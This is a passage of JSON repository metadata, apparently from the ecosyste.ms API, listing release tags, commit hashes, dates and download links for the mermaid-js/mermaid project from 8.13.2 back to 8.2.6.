","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/